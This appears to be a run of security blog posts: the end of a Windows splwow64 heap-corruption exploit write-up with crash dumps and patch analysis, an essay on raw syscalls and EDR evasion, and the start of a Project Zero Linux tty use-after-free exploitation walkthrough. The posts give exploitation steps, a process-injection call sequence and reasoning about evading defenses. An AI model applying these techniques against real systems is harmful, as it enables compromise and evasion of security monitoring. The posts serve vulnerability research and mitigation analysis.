That’s the format of our spray, but you’ll notice it’s crashing during allocation. Basically, the message buffer chunk was freed and we’ve managed to overwrite the freelist chunk’s forward link prior to it being reused. Once our next request comes in, it attempts to allocate a chunk out of this sized bucket and crashes walking the list.

Notably, we can also corrupt a busy chunk’s header, leading to a crash during the free process:

1
2
3
4
5
6
7
8
9
10
11
12
13
0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ffe`1d5b7e42     : 00000000`00000000 00007ffe`1d6187f0 00000000`00000003 00000000`014d0000 : ntdll!RtlReportCriticalFailure+0x56
01 00007ffe`1d5b812a     : 00000000`00000003 00000000`02d7f440 00000000`014d0000 00000000`014d9fc8 : ntdll!RtlpHeapHandleError+0x12
02 00007ffe`1d5bdd61     : 00000000`00000000 00000000`014d0150 00000000`00000000 00000000`014d9fd0 : ntdll!RtlpHpHeapHandleError+0x7a
03 00007ffe`1d555869     : 00000000`014d9fc0 00000000`00000055 00000000`00000000 00007ffe`00000027 : ntdll!RtlpLogHeapFailure+0x45
04 00007ffe`1d4c0df1     : 00000000`014d02e8 00000000`00000055 00000000`00000001 00000000`00000055 : ntdll!RtlpHeapFindListLookupEntry+0x94029
05 00007ffe`1d4c480b     : 00000000`014d0000 00000000`014d9fc0 00000000`014d9fc0 00000000`00000080 : ntdll!RtlpFindEntry+0x4d
06 00007ffe`1d4c95c4     : 00000000`014d0000 00000000`014d0000 00000000`014d9fc0 00000000`014d0000 : ntdll!RtlpFreeHeap+0x3bbcd s
07 00007ffe`1d4c5d21     : 00000000`00000000 00000000`014d0000 00000000`00000000 00000000`00000000 : ntdll!RtlpFreeHeapInternal+0x464
08 00007ffe`1cdf9c9c     : 00000000`030c1490 00000000`014d9fd0 00000000`014d9fd0 00000000`00000000 : ntdll!RtlFreeHeap+0x51
09 00007ff7`28b8805d     : 00000000`030c1490 00000000`014d9fd0 00000000`00000000 00000000`00000000 : msvcrt!free+0x1c
0a 00007ff7`28b88ada     : 00000000`00000000 00000000`00000000 00000000`030c0cd0 00000000`030c0d00 : splwow64!TLPCMgr::ProcessRequest+0x485

This is an interesting primitive because it grants us full control over a heap chunk, both free and busy, but unlike the browser world, full of its class objects and vtables, our message buffer is flat, already assumed to be untrustworthy. This means we can’t just overwrite a function pointer or modify an object length. Furthermore, the lifespan of the object is quite short. Once the message has been processed and the response copied back to the shared memory region, the chunk is released.

I spent quite a bit of time digging into public work on NT/LF heap exploitation primitives in modern Windows 10, but came up empty. Most work these days focuses on browser heaps and, typically, abusing object fields to gain code execution or AAR/AAW. @scwuaptx[7] has a great paper on modern heap internals/primitives[6] and an example from a CTF in β€˜19[5], but ends up using a FILE object to gain r/w which is unavailable here.

While I wasn’t able to take this to full code execution, I’m fairly confident this is doable provided the right heap primitive comes along. I was able to gain full control over a free and busy chunk with valid headers (leaking the heap encoding cookie), but Microsoft has killed all the public techniques, and I don’t have the motivation to find new ones (for now ;P).

The code is available on Github[8], which is based on the public PoC. It uses my technique described above to leak the heap cookie and smash a free chunk’s flink.

Patch

Microsoft patched this in January, just a few weeks after Project Zero FD’d the bug. They added a variety of things to the function, but the crux of the patch now requires a buffer size which is then used as a bounds check before performing memcpy’s.

GdiPrinterThunk now checks if DisableUmpdBufferSizeCheck is set in HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize. If it’s not, GdiPrinterThunk_Unpatched is used, otherwise, GdiPrinterThunk_Patched. I can only surmise that they didn’t want to break compatibility with…something, and decided to implement a hack while they work on a more complete solution (AppContainer..?). The new GdiPrinterThunk:

1
2
3
4
5
6
7
8
9
10
int GdiPrinterThunk(int MsgBuf, int MsgBufSize, int MsgOut, unsigned int MsgOutSize)
{
  int result;

  if ( gbIsUmpdBufferSizeCheckEnabled )
    result = GdiPrinterThunk_Patched(MsgBuf, MsgBufSize, (__int64 *)MsgOut, MsgOutSize);
  else
    result = GdiPrinterThunk_Unpatched(MsgBuf, (__int64 *)rval, rval);
  return result;
}

Along with the buf size they now also require the return buffer size and check to ensure it’s sufficiently large enough to hold output (this is supplied by the ProxyMsg in splwow64).

And the specific patch for the 0x6d memcpy:

1
2
3
4
5
6
7
8
9
10
11
12
13
SrcPtr = **MsgBuf_Off80;
if ( SrcPtr )
{
  SizeHigh = SrcPtr[34];
  DstPtr = *(void **)(MsgBuf + 88);
  dwCopySize = SizeHigh + SrcPtr[35];
  if ( DstPtr + dwCopySize <= _BufEnd        // ensure we don't write past the end of the MsgBuf
    && (unsigned int)dwCopySize >= SizeHigh  // ensure total is at least >= SizeHigh
    && (unsigned int)dwCopySize <= 0x1FFFE ) // sanity check WORD boundary
  {
    memcpy_0(DstPtr, SrcPtr, v276 + SrcPtr[35]);
  }
}

It’s a little funny at first and seems like an incomplete patch, but it’s because Microsoft has removed (or rather, inlined) all of the previous UMPDPointerFromOffset calls. It still exists, but it’s only called from within UMPDStringPointerFromOffset_Patched and now named UMPDPointerFromOffset_Patched. Here’s how they’ve replaced the source offset conversion/check:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
MCpySrcPtr = (unsigned __int64 *)(MsgBuf + 80);
if ( MsgBuf == -80 )
  goto LABEL_380;

MCpySrc = *MCpySrcPtr;
if ( *MCpySrcPtr )
{
  // check if the offset is less than the MsgBufSize and if it's at least 8 bytes past the src pointer struct (contains size words)
  if ( MCpySrc > (unsigned int)_MsgBufSize || (unsigned int)_MsgBufSize - MCpySrc < 8 )
    goto LABEL_380;
  
  // transform offset to pointer
  *MCpySrcPtr = MCpySrc + MsgBuf;
}

It seems messier this way, but is probably just compiler optimization. MCpySrc is the address of the source struct, which is:

1
2
3
4
5
typedef struct SrcPtr {
  DWORD offset;
  WORD SizeHigh;
  WORD SizeLow;
};

Size is likely split out for additional functionality in other LPC functions, but I didn’t bother figuring out why. The destination offset/pointer is resolved in a similar fashion.

Funny enough, the GdiPrinterThunk_Unpatched really is unpatched; the vulnerable memcpy code lives on.

References

[0] https://bugs.chromium.org/p/project-zero/issues/detail?id=2096
[1] https://whereisk0shl.top/post/the_story_of_cve_2021_1648
[2] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1648
[3] https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/
[4] https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html
[5] https://github.com/scwuaptx/LazyFragmentationHeap/blob/master/LazyFragmentationHeap_slide.pdf
[6] https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version
[7] https://twitter.com/scwuaptx
[8] https://github.com/hatRiot/bugs/tree/master/cve20211648

the fanciful allure and utility of syscalls

12 May 2021 at 21:10

So over the years I’ve had a number of conversations about the utility of using syscalls in shellcode, C2s, or loaders in offsec tooling and red team ops. For reasons likely related to the increasing maturity of EDRs and their totalitarian grip in enterprise environments, I’ve seen an uptick in projects and blogs championing β€œraw syscalls” as a technique for evading AV/SIEM technologies. This post is an attempt to describe why I think the technique’s efficacy has been overstated and its utility stretched thin.

This diatribe is not meant to denigrate any one project or its utility; if your tool or payload uses syscalls instead of ntdll, great. The technique is useful under certain circumstances and can be valuable in attempts at evading EDR, particularly when combined with other strategies. What it’s not, however, is a silver bullet. It is not going to grant you any particularly interesting capability by virtue of evading a vendor data sink. Determining its efficacy in context of the execution chain is difficult, ambiguous at best. Your C2 is not advanced in EDR evasion by including a few ntdll stubs.

Note that when I’m talking about EDRs, I’m speaking specifically to modern samples with online and cloud-based machine learning capabilities, both attended and unattended. Crowdstrike Falcon, Cylance, CybeReason, Endgame, Carbon Black, and others have a wide array of ML strategies of varying quality. This post is not an analysis of these vendors’ user mode hooking capabilities.

Finally, this discussion’s perspective is that of post-exploitation, necessary for an attacker to issue a syscall anyway. User mode hooks can provide useful telemetry on user behavior prior to code execution (phishing stages), but once that’s achieved, all bets of process integrity are off.

syscalling

Very briefly, using raw syscalls is an old technique that obviates the need to use sanctioned APIs and instead uses assembly to execute certain functions exposed to user mode from the kernel. For example, if you wanted to read memory of another process, you might use NtReadVirtualMemory:

1
NtReadVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);

This function is exported by NTDLL; at runtime, the PE loader loads every DLL in its import directory table, then resolves all of the import address table (IAT) function pointers. When we call NtReadVirtualMemory our pointers are fixed up based on the resolved address of the function, bringing us to execute:

1
2
3
4
5
6
7
8
00007ffb`1676d4f0 4c8bd1           mov     r10, rcx
00007ffb`1676d4f3 b83f000000       mov     eax, 3Fh
00007ffb`1676d4f8 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)], 1
00007ffb`1676d500 7503             jne     ntdll!NtReadVirtualMemory+0x15 (00007ffb`1676d505)
00007ffb`1676d502 0f05             syscall 
00007ffb`1676d504 c3               ret     
00007ffb`1676d505 cd2e             int     2Eh
00007ffb`1676d507 c3               ret 

This stub, implemented in NTDLL, moves the syscall number (0x3f) into EAX and uses syscall or int 2e, depending on the system bitness, to transition to the kernel. At this point the kernel begins executing the routine tied to code 0x3f. There are plenty of resources on how the process works and what happens on the way back, so please refer elsewhere.

Modern EDRs will typically inject hooks, or detours, into the implementation of the function. This allows them to capture additional information about the context of the call for further analysis. In some cases the call can be outright blocked. As a red team, we obviously want to stymie this.

With that, I want to detail a few shortcomings with this technique that I’ve seen in many of the public implementations. Let me once again stress here that I’m not trying to denigrate these tools; they provide utility and have their use cases that cannot be ignored, which I hope to highlight below.

syscall values are not consistent

j00ru maintains the go-to source for both nt and win32k, and by blindly searching around on here you can see the shift in values between functions. Windows 10 alone currently has eleven columns for the different major builds of Win10, some functions shifting 4 or 5 times. This means that we either need to know ahead of time what build the victim is running and tailor the syscall stubs specifically (at worst cumbersome in a post-exp environment), or we need to dynamically generate the syscall number at runtime.

There are several proposed solutions to discovering the syscall at runtime: sorting Zw exports, reading the stubs directly out of the mapped NTDLL, querying j00ru’s Github repository (lol), or actually baking every potential code into the payload and selecting the correct one at runtime. These are all usable options, but everything here is either cumbersome or an unnecessary risk in raising our threat profile with the EDRs ML model.

Let’s say you attempt to read NTDLL off disk to discover the stubs; that requires issuing CreateFile and ReadFile calls, both triggering minifilter and ETW events, and potentially executing already established EDR hooks. Maybe that raises your threat profile a few percentage points, but you’re still golden. You then need to copy that stub out into an executable section, setup the stack/registers, and invoke. Optionally, you could use the already mapped NTDLL; that requires either GetProcAddress, walking PEB, or parsing out the IAT. Are these events surrounding the resolution of the stub more or less likely to increase the threat profile than just calling the NTDLL function itself?

The least-bad option of these is baking the codes into your payload and switching at runtime based on the detection of the system version. In memory this is going to look like an s-box switch, but there are no extraneous calls to in-memory or on-disk files or stumbles up or down the PEB. This is great, but cumbersome if you need to support a range of languages and execution environments, particularly those with on-demand or dynamic requirements.

syscall’s miss useful/critical functionality

In addition to ease of use in C/C++, user mode APIs provide additional functionality prior to hitting the kernel. This could be setting up/formatting arguments, exception or edge-case handling, SxS/activation contexts, etc. Without using these APIs and instead syscalling yourself, you’re missing out on this, for better or for worse. In some cases it means porting that behavior directly to your assembler stub or setting up the environment pre/post execution.

In some cases, like WriteProcessMemory or CreateRemoteThreadEx, it’s more β€œhelpful” than actually necessary. In others, like CreateEnclave or CallEnclave, it’s virtually a requirement. If you’re angling to use only a specific set of functions (NtReadVirtualMemory/NtWriteVirtualMemory/etc) this might not be much of an issue, but expanding beyond that comes with great caveat.

the spooky functions are probably being called anyway

In general, syscalling is used to evade the use of some function known or suspected to be hooked in user mode. In certain scenarios we can guarantee that the syscall is the only way that hooked function is going to execute. In others, however, such as a more feature rich stage 0 or C2, we can’t guarantee this. Consider the following (pseudo-code):

1
2
3
4
UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

In the above we’ve opened a writable process handle, created a blob of memory, written into it, and started a thread to execute it. A very common process injection strategy. Setting aside the tsunami of information this feeds into the kernel, only dynamic instrumentation of the runtime would detect something like this. Any IAT or inline hooks are evaded.

But say your loader does a few other things, makes a few other calls to user32, dnsapi, kernel32, etc. Do you know that those functions don’t make calls into the very functions you’re attempting to avoid using? Now you could argue that by evading the hooks for more sensitive functionality (process injection), you’ve lowered your threat score with the EDR. This isn’t entirely true though because EDR isn’t blind to your remote thread (PsSetCreateThreadNotifyRoutine) or your writable process handle (ObRegisterCallbacks) or even your cross process memory write. So what you’ve really done is avoided sending contextualized telemetry to the kernel of the cross process injection β€” is that enough to avoid heightened scrutiny? Maybe.

Additionally, modern EDRs hook a ton of stuff (or at least some do). Most syscall projects and research focus on NTDLL; what about kernel32, user32, advapi32, wininet, etc? None of the syscall evasion is going to work here because, naturally, a majority of those don’t need to syscall into the kernel (or do via other ntdll functions…). For evasion coverage, then, you may need to both bolt on raw syscall support as well as a generic unhooking strategy for the other modules.

syscall’s are partially effective at escaping UM data sinks

Many user mode hooks themselves do not have proactive defense capabilities baked in. By and large they are used to gather telemetry on the call context to provide to the kernel driver or system service for additional analysis. This analysis, paired with what it’s gathered via ETW, kernel mode hooks, and other data sinks, forms a composite picture of the process since birth.

Let’s take the example of cross process code injection referenced above. Let’s also give your loader the benefit of the doubt and assume it’s triggered nothing and emitted little telemetry on its way to execution. When the following is run:

1
2
3
4
UseSysCall(NtOpenProcess, ...)
UseSysCall(NtAllocateVirtualMemory, ...)
UseSysCall(NtWriteVirtualMemory, ...)
UseSysCall(NtCreateThreadEx, ...)

We are firing off a ton of telemetry to the kernel and any listening drivers. Without a single user mode hook we would know:

  1. Process A opened a handle to Process B with X permissions (ObRegisterCallbacks)
  2. Process A allocated memory in Process B with X permissions (EtwTi)
  3. Process A wrote data into Process B VAS (EtwTi)
  4. Process A created a remote thread in Process B (PsSetCreateThreadNotifyRoutine, Etw)

It is true that EtwTi is newish and doesn’t capture everything, hence the partial effectiveness. But that argument grows thin overtime as adoption of the feed grows and the API matures.

A strong argument for syscalls here is that it evades custom data sinks. Up until now we’ve only considered what Microsoft provides, not what the vendor themselves might include in their hook routine, and how that telemetry might influence their agent’s model. Some vendors, for performance reasons, prefer to extract thread information at call time. Some capture all parameters and pack them into more consumable binary blobs for consumption in the kernel. Depending on what exactly the hook does, and its criticality to the bayesian model, this might be a great reason to use them.

your testing isn’t comprehensive or indicative of the general case

This is a more general gripe with some of the conversation on modern EDR evasion. Modern EDRs use a variety of learning heuristics to determine if an unknown binary is malicious or not; sometimes successfully, sometimes not. This model is initially trained on some set of data (depending on the vendor), but continues to grow based on its observations of the environment and data shared amongst nodes. This is generally known as online learning. On large deploys of new EDRs there is typically a learning or passive phase; that allows the model to collect baseline metrics of what is normal and, hopefully, identify anomalies or deviations thereafter.

Effectively then, given a long enough timeline, one enterprise’s agent model might be significantly different from another. This has a few implications. The first being, of course, that your lab environment is not an accurate representation of the client. While your syscall stub might work fine in the lab, unless it’s particularly novel, it’s entirely possible it’s been observed elsewhere.

This also means that pinpointing the reason why your payload works or doesn’t work is a bit of dark art. If your payload with the syscall evasion ends up working in a client environment, does that mean the evasion is successful, or would it have worked regardless of whether you used ntdll or not? If on the other hand your payload was blocked, can you identify the syscalls as the problem? Furthermore, if you add in evasion stubs and successfully execute, can we definitively point to the syscall evasion as the threat score culprit?

At this point, then, it’s a game of risk. You risk allowing the agent’s model to continue aggregating telemetry and improving its heuristic, and thereby the entire network’s model. Repeated testing taints the analysis chain as it grows to identify portions of your code as malicious or not; a fuzzy match, regardless of the function or assembler changes made. You also risk exposing the increased telemetry and details to the cloud which is then in the hands of both automated and manual tooling and analysis. If you disabled this portion, then, you also lack an accurate representation of detection capabilities.

In short, much of the testing we do against these new EDR solutions is rather unscientific. That’s largely a result of our inability to both peer into the state of an agent’s model while also deterministically assessing its capabilities. Testing in a limped state (ie. offline, with cloud connectivity blackholed, etc.) and restarting VMs after every test provides some basic insight but we lose a significant chunk of EDR capability. Isolation is difficult.

anyway

These things, when taken together, motivate my reluctance to embrace the strategy in much of my tooling. I’ve found scant cases in which a raw syscall was preferable to some other technique and I’ve become exhausted by the veracity of some tooling claims. The EDRs today are not the EDRs of our red teaming forefathers; testing is complicated, telemetry insight is improving, and data sets and enterprise security budgets are growing. We’ve got to get better at quantifying and substantiating our tool testing/analysis, and we need to improve the conversation surrounding the technologies.

I have a few brief, unsolicited thoughts for both red teams and EDR vendors based on my years of experience in this space. I’d love to hear others.

for EDR

Do not rely on user mode hooks and, more importantly, do not implicitly trust it. Seriously. Even if you’re monitoring hook integrity from the kernel, there are too many variables and too many opportunities for malicious code to tamper with or otherwise corrupt the hook or the integrity of the incoming data. Consider this from a performance perspective if you need to. I know you think you’re being cute by:

  1. Monitoring your hot patches for modification
  2. Encrypting telemetry
  3. Transmitting telemetry via clandestine/obscure methods (I see you NtQuerySystemInformation)
  4. β€œValidating” client processes

The fact is anything emitted from an unsigned, untrusted, user mode process can be corrupted. Put your efforts into consuming ETW and registering callbacks on all important routines, PPL’ing your user mode services, and locking down your IPC and general communication channels. Consume AMSI if you must, with the same caveat as user mode hooks: it is a data sink, and not necessarily one of truth.

The more you can consume in the kernel (maybe a trustlet some day?), the more difficult you are to tamper with. There is of course the ability for red team to wormhole into the kernel and attack your driver, but this is another hurdle for an attacker to leap, and yet another opportunity to catch them.

for red team

Using raw syscalls is but a small component of a greater system β€” evasion is less a set of techniques and more a system of behaviors. Consider that the hooks themselves are not the problem, but rather what the hooks do. I had to edit myself several times here to not reference the spoon quote from the Matrix, but it’s apt, if cliche.

There are also more effective methods of evading user mode hooks than raw syscalling. I’ve discussed some of them publicly in the past, but urge you to investigate the machinations of the EDR hooks themselves. I’d argue even IAT/inline unhooking is more effective, in some cases.

Cloud capabilities are the truly scary expansion. Sample submission, cloud telemetry aggregation and analysis, and manual/automatic hunting services change the landscape of threat analysis. Not only can your telemetry be correlated or bolstered amongst nodes, it can be retroactively hunted and analyzed. This retroactive capability, often provided by backend automation or threat hunting teams (hi Overwatch!) can be quite effective at improving an enterprises agent models. And not only one enterprises model; consider the fact that these data points are shared amongst all vendor subscribers, used to subsequently improve those agent models. Burning a technique is no longer isolated to a technology or a client.

How a simple Linux kernel memory corruption bug can lead to complete system compromise

By: Ryan
19 October 2021 at 16:08

An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from end of last year: I already wrote most of this blogpost around April, but only recently finished it)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
        spinlock_t ctrl_lock;
[...]
        struct pid *pgrp;               /* Protected by ctrl lock */
        struct pid *session;
[...]
        struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Both of these fields do not point directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

A special type of terminal device are pseudoterminals, which are used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal . You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.

One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
 *      tiocgpgrp               -       get process group
 *      @tty: tty passed by user
 *      @real_tty: tty side of the tty passed by the user if a pty else the tty
 *      @p: returned pid
 *
 *      Obtain the process group of the tty. If there is no process group
 *      return an error.
 *
 *      Locking: none. Reference to current->signal->tty is safe.
 */
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pid;
        int ret;
        /*
         * (tty == real_tty) is a cheap way of
         * testing if the tty is NOT a master pty.
         */
        if (tty == real_tty && current->signal->tty != real_tty)
                return -ENOTTY;
        pid = tty_get_pgrp(real_tty);
        ret =  put_user(pid_vnr(pid), p);
        put_pid(pid);
        return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to how these older parts of the userspace API are supposed to work. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't have anything in it about new APIs that have showed up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
 *      tiocspgrp               -       attempt to set process group
 *      @tty: tty passed by user
 *      @real_tty: tty side device matching tty passed by user
 *      @p: pid pointer
 *
 *      Set the process group of the tty to the session passed. Only
 *      permitted where the tty session is our session.
 *
 *      Locking: RCU, ctrl lock
 */
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pgrp;
        pid_t pgrp_nr;
[...]
        if (get_user(pgrp_nr, p))
                return -EFAULT;
[...]
        pgrp = find_vpid(pgrp_nr);
[...]
        spin_lock_irq(&tty->ctrl_lock);
        put_pid(real_tty->pgrp);
        real_tty->pgrp = get_pid(pgrp);
        spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)
  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
                                        real_tty->pgrp = get_pid(B)
    real_tty->pgrp = get_pid(A)
    spin_unlock_irq(...)                spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
        goto out_unlock;
    retval = 0;
-   spin_lock_irq(&tty->ctrl_lock);
+   spin_lock_irq(&real_tty->ctrl_lock);
    put_pid(real_tty->pgrp);
    real_tty->pgrp = get_pid(pgrp);
-   spin_unlock_irq(&tty->ctrl_lock);
+   spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
    rcu_read_unlock();
    return retval;

Attack stages

In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.

What we'd really want as an attacker is a way to skew the refcount deterministically. We'll have to somehow compensate for our lack of information about whether the refcount was skewed successfully. We could try to somehow make the race deterministic (seems difficult), or after each attempt to skew the refcount assume that the race worked and run the rest of the exploit (since if we didn't skew the refcount, the initial memory corruption is gone, and nothing bad will happen), or we can attempt to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
        int nr;
        struct pid_namespace *ns;
};

struct pid
{
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
        struct pid_namespace *ns;

        if (!pid)
                return;

        ns = pid->numbers[pid->level].ns;
        if ((atomic_read(&pid->count) == 1) ||
             atomic_dec_and_test(&pid->count)) {
                kmem_cache_free(ns->pid_cachep, pid);
                put_pid_ns(ns);
        }
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

root@deb10:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
root@deb10:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb  6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 seq_file -> :A-0000128
root@deb10:/sys/kernel/slab# 

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset pid eventpoll_epi / epitem (RCU-freed) seq_file
0x00 count.counter (4) (CONTROL) rbn.__rb_parent_color (8) (TARGET?) buf (8) (TARGET?)
0x04 level (4)
0x08 tasks[PIDTYPE_PID] (8) rbn.rb_right (8) / rcu.func (8) size (8)
0x10 tasks[PIDTYPE_TGID] (8) rbn.rb_left (8) from (8)
0x18 tasks[PIDTYPE_PGID] (8) rdllink.next (8) count (8)
0x20 tasks[PIDTYPE_SID] (8) rdllink.prev (8) pad_until (8)
0x28 rcu.next (8) next (8) index (8)
0x30 rcu.func (8) ffd.file (8) read_pos (8)
0x38 numbers[0].nr (4) ffd.fd (4) version (8)
0x3c [hole] (4) nwait (4)
